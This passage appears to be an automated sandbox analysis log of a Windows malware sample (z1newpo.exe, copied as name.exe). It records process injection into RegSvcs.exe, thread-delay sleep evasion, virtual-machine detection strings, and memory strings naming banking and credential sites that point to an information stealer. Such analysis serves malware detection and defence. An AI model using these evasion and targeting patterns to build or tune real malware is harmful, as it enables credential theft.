                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596101Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595918Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595773Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7353Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7043Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2779Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\z1newpo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87530
                    Source: C:\Users\user\Desktop\z1newpo.exeAPI coverage: 3.4 %
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.7 %
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.5 %
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00452492
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_004788BD
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,12_2_0045CAFA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045DE8F FindFirstFileW,FindClose,12_2_0045DE8F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599433Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598736Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597983Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596283Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596166Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595978Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595621Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594577Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598430Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596101Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595918Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595773Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3687808007.000000000096B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllame=W
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: wscript.exe, 0000000B.00000002.1384494835.0000020122A49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: RegSvcs.exe, 00000003.00000002.3686584741.00000000008C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: name.exe, 0000000C.00000002.1396296883.0000000000927000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#`R
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
